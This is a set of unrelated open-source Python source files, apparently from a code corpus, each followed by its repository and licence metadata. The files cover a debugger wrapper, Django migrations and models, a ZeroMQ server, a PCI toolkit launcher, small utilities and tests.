the advantage of ``TendrilPartial`` is that the positional argument
passed to the acceptor--the ``Tendril`` instance--will be the first
positional argument, rather than the last one, as would be the case
with ``functools.partial()``.
Wrappers
--------
A *wrapper* is simply a callable again taking a single argument--in
this case, the socket object--and returning a wrapped version of that
argument; that wrapped version of the socket will then be used in
subsequent network calls. A wrapper which manipulates socket options
can simply return the socket object which was passed in, while one
which performs SSL encapsulation can return the SSL wrapper. Again,
although there is no opportunity to pass arguments to the wrapper in a
manager ``start()`` or ``connect()`` call (or a ``Tendril`` object's
``wrap()`` call), ``functools.partial()`` or Tendril's
``TendrilPartial`` utility can be used. In particular, in conjunction
with ``TendrilPartial``, the ``ssl.wrap_socket()`` call can be used as
a socket wrapper directly, enabling an SSL connection to be set up
easily.
Of course, it may be necessary to perform multiple "wrapping"
activities on a connection, such as setting socket options followed by
wrapping the socket in an SSL connection. For this case, Tendril
provides the ``WrapperChain``; it can be initialized in the same way
that ``TendrilPartial`` is, but additional wrappers can be added by
calling the ``chain()`` method; when called, the ``WrapperChain``
object will call each wrapper in the order defined, returning the
final wrapped socket in the end.
"""
from application import *
from connection import *
from framers import *
from manager import *
from utils import *
__all__ = (application.__all__ + connection.__all__ + framers.__all__ +
manager.__all__ + utils.__all__)
|
klmitch/tendril
|
tendril/__init__.py
|
Python
|
gpl-3.0
| 12,025
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-07-26 21:00
from __future__ import unicode_literals
from django.db import migrations, models
import image_cropping.fields
class Migration(migrations.Migration):
dependencies = [
('gardens', '0009_auto_20170726_2055'),
]
operations = [
migrations.AddField(
model_name='gardenphoto',
name='hero',
field=image_cropping.fields.ImageRatioField('image', '1600x484', adapt_rotation=False, allow_fullsize=False, free_crop=False, help_text=None, hide_image_field=False, size_warning=False, verbose_name='hero'),
),
migrations.AddField(
model_name='gardenphoto',
name='is_hero',
field=models.BooleanField(default=False, verbose_name='Hero Image'),
preserve_default=False,
),
migrations.AddField(
model_name='gardenphoto',
name='main',
field=image_cropping.fields.ImageRatioField('image', '600x400', adapt_rotation=False, allow_fullsize=False, free_crop=False, help_text=None, hide_image_field=False, size_warning=False, verbose_name='main'),
),
]
|
bengosney/rhgd3
|
gardens/migrations/0010_auto_20170726_2100.py
|
Python
|
gpl-3.0
| 1,195
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2015-2016 Jakub Beranek
#
# This file is part of Devi.
#
# Devi is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, version 3 of the License, or
# (at your option) any later version.
#
# Devi is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Devi. If not, see <http://www.gnu.org/licenses/>.
#
import os
import threading
import debugger.util as util
from debugger.debugger_api import StartupInfo
from debugger.enums import ProcessState, DebuggerState
from debugger.mi.breakpoint_manager import BreakpointManager
from debugger.mi.communicator import Communicator
from debugger.mi.file_manager import FileManager
from debugger.mi.heap_manager import HeapManager
from debugger.mi.io_manager import IOManager
from debugger.mi.thread_manager import ThreadManager
from debugger.mi.variable_manager import VariableManager
from debugger import debugger_api
shlib_path = util.get_root_path("build/debugger/liballochook.so")
if not os.path.isfile(shlib_path):
raise BaseException(
"liballochook.so is missing in {}. Please run install.sh."
"".format(os.path.dirname(shlib_path))
)
class MiDebugger(debugger_api.Debugger):
def __init__(self):
super(MiDebugger, self).__init__()
self.communicator = Communicator()
self.communicator.on_process_change.subscribe(
self._handle_process_state)
self.io_manager = IOManager()
self.breakpoint_manager = BreakpointManager(self)
self.file_manager = FileManager(self)
self.thread_manager = ThreadManager(self)
self.variable_manager = VariableManager(self)
self.heap_manager = HeapManager(self)
self.exit_lock = threading.RLock()
self.binary_path = None
def _handle_process_state(self, output):
"""
@type output: mi.communicator.StateOutput
"""
util.Logger.debug("Process state changed: {0}".format(output.state))
self.process_state = output.state
if output.state == ProcessState.Exited:
self._cleanup_program()
self._on_program_ended(output.exit_code)
elif output.state == ProcessState.Stopped:
self.on_process_state_changed.notify(
output.state,
debugger_api.ProcessStoppedEventData(output.reason)
)
else:
self.on_process_state_changed.notify(output.state, None)
def require_state(self, required_state):
if not self.get_state().is_set(required_state):
raise util.BadStateError(required_state, self.state)
def get_state(self):
return self.state
def get_process_state(self):
return self.process_state
def load_binary(self, binary_path):
binary_path = os.path.abspath(binary_path)
self.communicator.start_gdb()
result = self.communicator.send(
"-file-exec-and-symbols {0}".format(binary_path))
util.Logger.debug("Loading program binary {0} succeeded: {1}".format(
binary_path, result.is_success()))
if result.is_success():
self.state.set(DebuggerState.BinaryLoaded)
self.communicator.send("-gdb-set mi-async on")
self.binary_path = binary_path
return True
else:
return False
def launch(self, startup_info=None):
"""
@type startup_info: StartupInfo | None
@rtype: bool
"""
if startup_info is None:
startup_info = StartupInfo()
if startup_info.working_directory == "":
startup_info.working_directory = os.path.dirname(self.binary_path)
self.require_state(DebuggerState.BinaryLoaded)
stdin, stdout, stderr = self.io_manager.handle_io()
alloc_file = self.heap_manager.watch()
startup_info.env_vars.append(("DEVI_ALLOC_FILE_PATH", alloc_file))
startup_info.env_vars.append(("LD_PRELOAD", shlib_path))
for env_var in startup_info.env_vars:
self.communicator.send("set environment {}={}".format(
env_var[0], env_var[1]
))
self.communicator.send("cd {}".format(startup_info.working_directory))
self.on_process_state_changed.notify(ProcessState.Launching, None)
result = self.communicator.send("run 1>{0} 2>{1} <{2} {3}".format(
stdout,
stderr,
stdin,
startup_info.cmd_arguments
))
util.Logger.debug("Launching program: {0}".format(result))
if result:
self.state.set(DebuggerState.Running)
return result.is_success()
def exec_continue(self):
self.require_state(DebuggerState.Running)
self.communicator.send("-exec-continue")
def exec_pause(self):
self.require_state(DebuggerState.Running)
self.communicator.pause_program()
self.communicator.send("interrupt")
def exec_step_over(self):
self.require_state(DebuggerState.Running)
self.communicator.send("-exec-next")
def exec_step_in(self):
self.require_state(DebuggerState.Running)
self.communicator.send("-exec-step")
def exec_step_out(self):
self.require_state(DebuggerState.Running)
self.communicator.send("-exec-finish")
def quit_program(self, return_code=1):
if not self.state.is_set(DebuggerState.Running):
return
self.communicator.quit_program()
self._cleanup_program()
self._on_program_ended(return_code)
def terminate(self):
self.quit_program()
self.communicator.kill()
def _cleanup_program(self):
self.exit_lock.acquire()
try:
if not self.state.is_set(DebuggerState.Running):
return
util.Logger.debug("Cleaning debugged process")
self.state.unset(DebuggerState.Running)
self.io_manager.stop_io()
self.heap_manager.stop()
finally:
self.exit_lock.release()
def _on_program_ended(self, return_code):
self.process_state = ProcessState.Exited
self.on_process_state_changed.notify(
ProcessState.Exited,
debugger_api.ProcessExitedEventData(return_code))
|
Kobzol/debug-visualizer
|
debugger/mi/mi_debugger.py
|
Python
|
gpl-3.0
| 6,700
|
# -*- coding: utf-8 -*-
from module.plugins.internal.DeadCrypter import DeadCrypter, create_getInfo
class HotfileComFolder(DeadCrypter):
__name__ = "HotfileComFolder"
__type__ = "crypter"
__version__ = "0.3"
__pattern__ = r'https?://(?:www\.)?hotfile\.com/list/\w+/\w+'
__config__ = []
__description__ = """Hotfile.com folder decrypter plugin"""
__license__ = "GPLv3"
__authors__ = [("RaNaN", "RaNaN@pyload.org")]
getInfo = create_getInfo(HotfileComFolder)
|
sebdelsol/pyload
|
module/plugins/crypter/HotfileComFolder.py
|
Python
|
gpl-3.0
| 511
|
#!/usr/bin/env python
"""server.py.py: Module Description ..."""
from __future__ import print_function
import gevent
import time
import zmq.green as zmq
import ga_messages_pb2 as gmessages
__author__ = "Minos Galanakis"
__license__ = "GPL3"
__version__ = "0.0.1"
__email__ = "minos197@gmail.com"
__project__ = "ga"
__date__ = "19-05-2017"
def compose_ack(ack="ACK"):
""" Compose a standard acknowlege message """
# Add the metadata
msg = gmessages.Message()
msg.metadata.message_type = 0
msg.metadata.device_id = 0
msg.metadata.network_id = 0
msg.metadata.application_id = 0
msg.metadata.tx_time = int(time.time())
msg.metadata.sequence = 1
msg.metadata.periph_count = 0
msg.metadata.device_name = "Server"
# Add an ACK command
msg.control.key = 0
msg.control.is_indexed = False
msg.control.cmd = ack
return msg
def server():
# Set up port and protocol
port = "24124"
binding = "tcp://*:%s" % port
# Set up 0MQ as Request/Response topology
context = zmq.Context()
server_socket = context.socket(zmq.REP)
# Bind to the socket
server_socket.bind(binding)
while True:
# Receive the mesasage
message = server_socket.recv()
try:
# De-Serialize it
msg = gmessages.Message()
msg.ParseFromString(message)
# Report it
print(("Message of type \"%d\"received from \"%s\" "
"with %d peripherals") % (msg.metadata.message_type,
msg.metadata.device_name,
msg.metadata.periph_count))
for p in msg.peripheral:
print(("Peripheral \"%s\" with id: \"%d\""
" contains payload of \"%s\"") % (p.peripheral_name,
p.peripheral_id,
repr(p.payload)[1:-1]))
print("")
ack = compose_ack("ACK")
except Exception:
ack = compose_ack("NACK")
# Respond to client
server_socket.send(ack.SerializeToString())
if __name__ == "__main__":
try:
server = gevent.spawn(server)
server.join()
except KeyboardInterrupt:
print("Shutting Down Server")
|
minosg/guardian_angel
|
dev/prototyping/server.py
|
Python
|
gpl-3.0
| 2,369
|
# -*- coding: utf-8 -*-
from django.conf import settings
from pyerp.fnd.shortcuts import fnd_render_to_response
from pyerp.fnd.gbl import fnd_global
from pyerp.fnd.utils.version import get_svn_revision, get_version
__svnid__ = '$Id$'
__svn__ = get_svn_revision(__name__)
def display_login_form(request, error_message='', app_path=None, extra_context=None):
request.session.set_test_cookie()
context = {
'app_path': app_path or request.get_full_path(),
'error_message': error_message,
}
context.update(extra_context or {})
return fnd_render_to_response('pub/login/login.html', context)
def login(request):
return display_login_form(request,
'',
fnd_global.context_prefix + settings.FND_USER_SITE_PREFIX + 'main/')
|
dreams6/pyerpcn
|
pyerp/fnd/functions/pub/login/views.py
|
Python
|
gpl-3.0
| 829
|
import os
import sys
def build_exe(filename, version="1.0.0", description="", author="", modules=[], includes=[], packages="[]", include_files=[], zip_includes=[], icon=None, additional_executables=[], target=None,
window=True, onefile=True):
args = []
if window:
args.append("--noconsole")
if onefile:
args.append("--onefile")
if hasattr(filename, "__file__"):
filename = filename.__file__
cmd = '%s/scripts/pyinstaller.exe %s %s' % (os.path.dirname(sys.executable), " ".join(args), filename)
print (cmd)
os.system(cmd)
print ("finish")
|
madsmpedersen/MMPE
|
build_exe/pyinstaller/build_exe.py
|
Python
|
gpl-3.0
| 615
|
#!/usr/bin/env python
'''
ThunderGate - an open source toolkit for PCI bus exploration
Copyright (C) 2015-2016 Saul St. John
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import os
import sys
import subprocess
import platform
import logging
class tglog(logging.Formatter):
cmap= {logging.NOTSET: '?', logging.DEBUG: '.', logging.INFO: '+',
logging.WARNING: '-', logging.ERROR: '!', logging.CRITICAL: '*'}
def format(self, rec):
return "[%s] %s" % (self.cmap[rec.levelno], rec.msg % rec.args)
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
formatter = tglog()
ch.setFormatter(formatter)
logger.addHandler(ch)
sys_name = platform.system()
if __name__ == "__main__":
tgdir = sys.argv[0]
if tgdir != "":
tgdir = os.path.abspath(tgdir)
tgdir = os.sep.join(tgdir.split(os.sep)[:-2])
cwd = os.getcwd()
if tgdir != cwd:
logger.warn("resetting cwd (was %s, now %s)", cwd, tgdir)
os.chdir(tgdir)
from device import Device
if sys_name == "Linux":
from interfaces.sysfs import SysfsInterface
from interfaces.vfio import VfioInterface
from interfaces.uio import UioInterface
elif sys_name == "Windows" or sys_name == "cli":
from interfaces.win import WinInterface
else:
raise NotImplementedError("this version of thundergate only runs on linux and windows")
import reutils
import argparse
def banner():
print """
####### #####
# # # # # # # ##### ###### ##### # # ## ##### ######
# # # # # ## # # # # # # # # # # #
# ###### # # # # # # # ##### # # # #### # # # #####
# # # # # # # # # # # ##### # # ###### # #
# # # # # # ## # # # # # # # # # # #
# # # #### # # ##### ###### # # ##### # # # ######
Version 0.9.9
Copyright (c) 2015-2016 Saul St John
http://thundergate.io
"""
def main(args):
parser = argparse.ArgumentParser()
if sys_name == "Linux":
parser.add_argument("--device", help="BDF of tg3 PCI device", default=None)
parser.add_argument("--devid", help="id of tg3 PCI device", default=None)
parser.add_argument("-p", "--ptvsd", help="enable ptvsd server", action="store_true")
parser.add_argument("--ptvsdpass", help="ptvsd server password", default=None)
parser.add_argument("-t", "--tests", help="run tests", action="store_true")
parser.add_argument("-s", "--shell", help="ipython cli", action="store_true")
parser.add_argument("-b", "--backup", help="create eeprom backup", action="store_true", default=False)
parser.add_argument("-d", "--driver", help="load userspace tap driver", action="store_true")
parser.add_argument("-i", "--install", help="install thundergate firmware", action="store_true")
parser.add_argument("--wait", help="wait for debugger attachment at startup", action="store_true")
parser.add_argument("--cdpserver", help="launch VS Code debug protocol server", action="store_true")
parser.add_argument("-g", "--gui", help="launch wxpython gui", action="store_true")
args = parser.parse_args(args=args[1:])
if args.cdpserver:
conout = sys.stdout
conin = sys.stdin
sys.stdin = open(os.devnull, "r")
sys.stdout = open("cdp.%d.log" % os.getpid(), "w")
banner()
ima = "inspector"
try:
if args.driver: ima = "userspace driver"
except:
pass
logger.info("tg3 %s initializing" % ima)
logger.debug("process id is %d" % os.getpid())
if args.ptvsd:
import ptvsd
ptvsd.enable_attach(secret=args.ptvsdpass)
if args.wait:
logger.info("waiting for ptvsd client...")
ptvsd.wait_for_attach()
logger.info("ptvsd client attached!")
ptvsd.break_into_debugger()
else:
logger.info("ptvsd server enabled")
elif args.wait:
print "[!] press 'enter' to continue..."
raw_input()
if sys_name == 'Linux':
if args.device is None:
devid = args.devid
if devid is None:
devid = "14e4:1682"
dbdf = subprocess.check_output(["lspci", "-d %s" % devid, "-n"]).split(" ")[0].strip()
if '' == dbdf:
logger.error("tigon3 device not found")
return 1
else:
dbdf = args.device
if len(dbdf.split(':')) == 2:
dbdf = "0000:%s" % dbdf
if not os.path.exists("/sys/bus/pci/devices/%s/" % dbdf):
logger.error(
"device resources at /sys/bus/pci/devices/%s/ not found; " +
"is sysfs mounted?", dbdf)
return 1
try:
kmod = os.readlink("/sys/bus/pci/devices/%s/driver" % dbdf).split('/')[-1]
except:
kmod = ''
if kmod == 'vfio-pci':
dev_interface = VfioInterface(dbdf)
elif kmod == 'uio_pci_generic':
dev_interface = UioInterface(dbdf)
else:
dev_interface = SysfsInterface(dbdf)
if kmod == 'tg3' and args.driver:
logger.error("device is currently bound to tg3; this won't work")
return 1
elif sys_name == 'Windows' or sys_name == 'cli':
try:
dev_interface = WinInterface()
except:
dev_interface = None
if not args.backup:
if not os.path.exists("eeprom.bak"):
logger.warn("no backup image found")
if not args.cdpserver:
resp = raw_input("\n\n" +
"would you like to create a backup image (y/n): ")
if resp[0] in "yY":
args.backup = True
with Device(dev_interface) as dev:
if args.backup:
dev.nvram.init()
dev.nvram.dump_eeprom("eeprom.bak")
logger.info("eeprom backup saved as 'eeprom.bak'")
if args.install:
from tginstall import TgInstaller
with TgInstaller(dev) as i:
return i.run()
elif args.shell:
from shelldrv import ShellDriver
with ShellDriver(dev) as shell:
if args.tests:
from testdrv import TestDriver
with TestDriver(dev) as test:
test.run()
return shell.run(loc=locals())
else:
return shell.run(loc=locals())
elif args.cdpserver:
from cdpserver import CDPServer
with CDPServer(dev, conin, conout) as server:
return server.run()
elif args.gui:
import gui
dev.reset(cold = True)
gui._run(dev)
else:
if args.driver:
import tap
return tap.run(dev)
elif args.tests:
from testdrv import TestDriver
with TestDriver(dev) as test:
return test.run()
if __name__ == "__main__":
sys.exit(main(sys.argv))
|
sstjohn/thundergate
|
py/main.py
|
Python
|
gpl-3.0
| 7,973
|
#!/usr/bin/env python
# Small program for storing and retrieving paths from a database
# Copyright (C) 2014 Gustav Behm
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from os.path import expanduser, isfile
from os import getcwd
import anydbm
from optionparser import OptionParser, Command, Configuration
import sys
import tabularize
# Global configuration parameters
name = "qcd"
default_db_file = "~/." + name + "db"
# Wrappers for managing the database
def initialize_database (writeable = False):
file = expanduser (file_option.value)
if not writeable and not isfile(file):
print >> sys.stderr, "Database is empty! Try adding something!"
sys.exit (1)
if writeable:
return anydbm.open (file, 'c')
else:
return anydbm.open (file, 'r')
def close_database (db):
db.close ()
# Helpers
def getAnonymousKey (db):
i = 1;
while True:
if not str(i) in db:
return str(i)
i += 1
def syntaxError (info = ""):
print >> sys.stderr, "Syntax error!" + info
parser.usage ()
sys.exit (2)
# Implementation of the commands
def add (args):
if len (args) == 0 or len (args) > 2:
syntaxError ()
db = initialize_database (True)
if len (args) == 2:
key = args[0]
db[key] = args[1]
else:
key = getAnonymousKey (db)
db[key] = args[0]
close_database (db)
def save (args):
if len (args) > 1:
syntaxError ()
args.append ( getcwd() )
add (args)
def change (args):
if len (args) != 2:
syntaxError ()
db = initialize_database (True)
if not args[0] in db:
print >> sys.stderr, args[0] + " does not exist in the database."
close_database (db)
sys.exit (1)
db[args[0]] = args[1]
close_database (db)
def move(args):
if len (args) != 2:
syntaxError ()
db = initialize_database (True)
if not args[0] in db:
print >> sys.stderr, args[0] + " does not exist in the database."
close_database (db)
sys.exit (1)
if args[1] in db:
print >> sys.stderr, args[1] + " already exist in the database."
close_database (db)
sys.exit (1)
db[args[1]] = db[args[0]]
del db[args[0]]
close_database (db)
def delete (args):
if len (args) != 1:
syntaxError ()
db = initialize_database (True)
try:
del db[args[0]]
except:
print >> sys.stderr, args[0] + " does not exist in the database."
close_database (db)
sys.exit (1)
close_database (db)
def list (args):
if len (args) != 0:
syntaxError ()
db = initialize_database ()
tabularize.write (sorted (db.iteritems()), writeable = sys.stderr)
close_database (db)
def get (args):
if len (args) != 1:
syntaxError ()
db = initialize_database ()
try:
print db[args[0]]
except:
print >> sys.stderr, args[0] + " does not exist in the database."
close_database (db)
sys.exit (1)
close_database (db)
# The command line parser
parser = OptionParser (name)
# The options
file_option = Configuration ("f", "file", "Specifies which database to use",
default_db_file, syntax = "FILENAME")
parser.add (file_option)
# The commands
help_command = Command ("h", "help", "Prints this helpful message",
lambda args:parser.usage ())
parser.add (help_command)
add_command = Command ("a", "add", "Add a new entry into the database", add,
syntax = "[LABEL] PATH")
parser.add (add_command)
save_command = Command ("s", "save", "Add current path into the database",
save, syntax = "[LABEL]")
parser.add (save_command)
move_command = Command ("m", "move", "Rename an entry in the database", move,
syntax = "FROM TO")
parser.add (move_command)
change_command = Command ("c", "change",
"Changes the path of an entry in the database", change,
syntax = "LABEL NEW_PATH")
parser.add (change_command)
delete_command = Command ("d", "delete", "Delete an entry from the database",
delete, syntax = "LABEL")
parser.add (delete_command)
list_command = Command ("l", "list", "List the entries in the database", list)
parser.add (list_command)
retrieve_command = Command ("g", "get", "Retrieve an entry from the database",
get, True, syntax = "LABEL")
parser.add (retrieve_command)
# Parse it!
parser.parse ()
|
rootmos/qcd
|
qcd.py
|
Python
|
gpl-3.0
| 5,030
|
def my_power_func(n, a):
if a == 0: return 1
y = my_power_func(n, a/2)
if a % 2 == 0:
return y*y
else:
return n*my_power_func(n, a-1)
print my_power_func(3, 6)
|
purushothamc/myibitsolutions
|
mathematics/power_function.py
|
Python
|
gpl-3.0
| 194
|
#
# Copyright 2017 Russell Smiley
#
# This file is part of timetools.
#
# timetools is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# timetools is distributed in the hope that it will be useful
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with timetools. If not, see <http://www.gnu.org/licenses/>.
#
import timetools.synchronization.compliance.analysis as tsca
# Rec. ITU-T G.8262/Y.1362 (2010)/Amd.2 (10/2012), Appendix V, Table V.1, pp 2
tdevNs = tsca.Mask([ ([0.1, 1.73], [10.2]),
([1.73, 30], [0, 5.88]),
([30, 1000], ([32.26], [0.5]))])
|
blueskyjunkie/timeTools
|
timetools/synchronization/compliance/ituTG8262/eecOption2/noiseTransfer.py
|
Python
|
gpl-3.0
| 986
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import fields, models
class SurveyStage(models.Model):
_name = 'survey.stage'
_description = 'Survey Stage'
_order = 'sequence,id'
name = fields.Char(required=True, translate=True)
sequence = fields.Integer(default=1)
closed = fields.Boolean(help="If closed, people won't be able to answer to surveys in this column.")
fold = fields.Boolean(string="Folded in kanban view")
_sql_constraints = [
('positive_sequence', 'CHECK(sequence >= 0)', 'Sequence number MUST be a natural')
]
|
t3dev/odoo
|
addons/survey/models/survey_stage.py
|
Python
|
gpl-3.0
| 637
|
"""
WSGI config for circuitSimSite project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "circuitSimSite.settings")
application = get_wsgi_application()
|
daniloefl/circuitSim
|
web/circuitSimSite/circuitSimSite/wsgi.py
|
Python
|
gpl-3.0
| 405
|
import functools
from numpy import *
arange = functools.partial(arange, dtype="float")
array = functools.partial(array, dtype="float")
|
pavpanchekha/oranj
|
oranj/pystdlib/numpy_or.py
|
Python
|
gpl-3.0
| 136
|
from urbansearch.clustering import text_preprocessor
p = text_preprocessor.PreProcessor()
def test_strip_words():
text = ['de', 'buik', 'van', 'Marko']
expected = ['buik', 'Marko']
assert expected == p.strip_words(text)
def test_strip_words_size():
text = ['aa', 'bbb', 'cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc']
expected = ['bbb']
assert p.strip_words(text) == expected
def test_clean_text():
text = 'a, . cd ; f 23213'
expected = 'a cd f '
result = p.clean_text(text)
assert result == expected
def test_tokenize():
text = 'een twee drie'
expected = ['een', 'twee', 'drie']
assert expected == p.tokenize(text)
def test_full_preprocessing():
text = 'Een is oke. Dit niet: twee, drie.'
expected = 'Een is oke Dit niet twee drie'
assert expected == p.pre_process(text)
def test_full_preprocessing_to_array():
text = 'Een is oke. Dit niet: twee, drie.'
expected = ['oke', 'twee', 'drie']
assert expected == p.pre_process_to_array(text)
|
urbansearchTUD/UrbanSearch
|
tests/clustering/test_text_preprocessor.py
|
Python
|
gpl-3.0
| 1,044
|
class Solution:
# backtracking/recursion
def subsets(self, nums):
"""
:type nums: List[int]
:rtype: List[List[int]]
"""
def backtracking(ans, s_set, r_nums, s_len, t_len):
if s_len == t_len:
ans.append(s_set)
return
for i in range(len(r_nums)):
backtracking(ans, s_set+[r_nums[i]], r_nums[i+1:], s_len+1, t_len)
ans = [[]]
for i in range(1, len(nums)+1):
backtracking(ans, [], nums, 0, i)
return ans
# bit manipulation
# def subsets(self, nums):
# """
# :type nums: List[int]
# :rtype: List[List[int]]
# """
# n = len(nums)
# bits = [bin(i)[2:] for i in range(2**n)]
# ans = []
# for bit in bits:
# sub = []
# for i in range(1, len(bit)+1):
# if bit[-i] == '1':
# sub.append(nums[-i])
# ans.append(sub)
# return ans
|
YiqunPeng/Leetcode-pyq
|
solutions/78Subsets.py
|
Python
|
gpl-3.0
| 1,090
|
def to_icinga2_expression(a):
return "\n".join([var2string(k, v) for (k, v) in a.items()])
def var2string(key, value):
"""
generate vars.*http_vhosts*[*Default Page*] = { ... } entries if value is a dict
vars.*os* = ... entries if value is a string
:param key:
:param value:
:return:
"""
# simple string values like var.os = "Linux"
if type(value) is str:
return 'vars.%s = "%s"' % (key, value)
if type(value) is int:
return 'vars.%s = %d' % (key, value)
if type(value) is list:
return 'vars.%s = [ "%s" ]' % (key, '", "'.join(value))
elif type(value) is dict:
return "\n".join(
['vars.%s["%s"] = {\n%s\n}' % (key, entry, var_keys2string(values)) for entry, values in value.items()]
)
else:
raise TypeError("unknown type %s, expecting type dict, list, str or int" % type(value))
def var_keys2string(values):
"""
generates the values part of vars.xyz["myKey"] = *{ values }*
:param values:
:return:
"""
return "\n".join([" " + value2string(k, v) for k, v in values.items()])
def value2string(key, value):
if type(value) is int:
return '%s = %s' % (key, value)
elif type(value) is list:
print(['"%s"' % str(i) for i in value])
return "%s = [ %s ]" % (key, ", ".join(['"%s"' % str(i) for i in value]))
else:
return '%s = "%s"' % (key, value)
class FilterModule(object):
@staticmethod
def filters():
return {
'to_icinga2': to_icinga2_expression
}
|
zauberpony/ansible-to-icinga2
|
filter_plugins/to_icinga2.py
|
Python
|
gpl-3.0
| 1,574
|
#!/usr/bin/python
"""
CONFIG CONVERTER
this script converts your custom tag string section from the v.3.1 syntax
to the current format.
>>> tagsections_convert.py -o config.new config.old
will convert your whole alot config safely to the new format.
"""
from configobj import ConfigObj
import argparse
import sys
import re
def get_leaf_value(cfg, path, fallback=''):
if len(path) == 1:
if isinstance(cfg, ConfigObj):
if path[0] not in cfg.scalars:
return fallback
else:
return cfg[path[0]]
else:
if path[0] not in cfg:
return fallback
else:
return cfg[path[0]]
else:
if path[0] in cfg:
scfg = cfg[path[0]]
sp = path[1:]
return get_leaf_value(scfg, sp, fallback)
else:
return None
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='update alot theme files')
parser.add_argument('configfile', type=argparse.FileType('r'),
help='theme file to convert')
parser.add_argument('-o', type=argparse.FileType('w'), dest='out',
help='destination', default=sys.stdout)
args = parser.parse_args()
cfg = ConfigObj(args.configfile)
out = args.out
print args
def is_256(att):
r = r'(g\d{1,3}(?!\d))|(#[0-9A-Fa-f]{3}(?![0-9A-Fa-f]))'
return re.search(r, att)
if 'tags' in cfg:
for tag in cfg['tags'].sections:
sec = cfg['tags'][tag]
att = [''] * 6
if 'fg' in sec:
fg = sec['fg']
if not is_256(fg):
att[2] = fg
att[4] = fg
del sec['fg']
if 'bg' in sec:
bg = sec['bg']
if not is_256(bg):
att[3] = bg
att[5] = bg
del sec['bg']
sec['normal'] = att
if sec.get('hidden'):
sec['translated'] = ''
cfg.write(out)
|
dcbaker/alot
|
extra/tagsections_convert.py
|
Python
|
gpl-3.0
| 2,099
|
from .base import main
|
ForgemAR/rocket-tip-creation
|
conegen/__init__.py
|
Python
|
gpl-3.0
| 23
|
#!/usr/bin/python
################################################################################
##3456789 123456789 123456789 123456789 123456789 123456789 123456789 123456789
## 10 20 30 40 50 60 70 80
##
## Info:
## Example of how to use libnotify correctly and at the same time comply to
## the new jaunty notification spec (read: visual guidelines)
##
## Run:
## chmod +x append-hint-example.py
## ./append-hint-example.py
##
## Copyright 2009 Canonical Ltd.
##
## Author:
## Mirco "MacSlow" Mueller <mirco.mueller@canonical.com>
##
## This program is free software: you can redistribute it and/or modify it
## under the terms of the GNU General Public License version 3, as published
## by the Free Software Foundation.
##
## This program is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranties of
## MERCHANTABILITY, SATISFACTORY QUALITY, or FITNESS FOR A PARTICULAR
## PURPOSE. See the GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License along
## with this program. If not, see <http://www.gnu.org/licenses/>.
##
################################################################################
import sys
import time
import pynotify
# even in Python this is globally nasty :), do something nicer in your own code
capabilities = {'actions': False,
'body': False,
'body-hyperlinks': False,
'body-images': False,
'body-markup': False,
'icon-multi': False,
'icon-static': False,
'sound': False,
'image/svg+xml': False,
'x-canonical-private-synchronous': False,
'x-canonical-append': False,
'x-canonical-private-icon-only': False,
'x-canonical-truncation': False}
def initCaps ():
caps = pynotify.get_server_caps ()
if caps is None:
print "Failed to receive server caps."
sys.exit (1)
for cap in caps:
capabilities[cap] = True
def printCaps ():
info = pynotify.get_server_info ()
print "Name: " + info["name"]
print "Vendor: " + info["vendor"]
print "Version: " + info["version"]
print "Spec. Version: " + info["spec-version"]
caps = pynotify.get_server_caps ()
if caps is None:
print "Failed to receive server caps."
sys.exit (1)
print "Supported capabilities/hints:"
if capabilities['actions']:
print "\tactions"
if capabilities['body']:
print "\tbody"
if capabilities['body-hyperlinks']:
print "\tbody-hyperlinks"
if capabilities['body-images']:
print "\tbody-images"
if capabilities['body-markup']:
print "\tbody-markup"
if capabilities['icon-multi']:
print "\ticon-multi"
if capabilities['icon-static']:
print "\ticon-static"
if capabilities['sound']:
print "\tsound"
if capabilities['image/svg+xml']:
print "\timage/svg+xml"
if capabilities['x-canonical-private-synchronous']:
print "\tx-canonical-private-synchronous"
if capabilities['x-canonical-append']:
print "\tx-canonical-append"
if capabilities['x-canonical-private-icon-only']:
print "\tx-canonical-private-icon-only"
if capabilities['x-canonical-truncation']:
print "\tx-canonical-truncation"
print "Notes:"
if info["name"] == "notify-osd":
print "\tx- and y-coordinates hints are ignored"
print "\texpire-timeout is ignored"
print "\tbody-markup is accepted but filtered"
else:
print "\tnone"
def pushNotification (title, body, icon):
n = pynotify.Notification (title, body, icon);
n.set_hint_string ("x-canonical-append", "true");
n.show ()
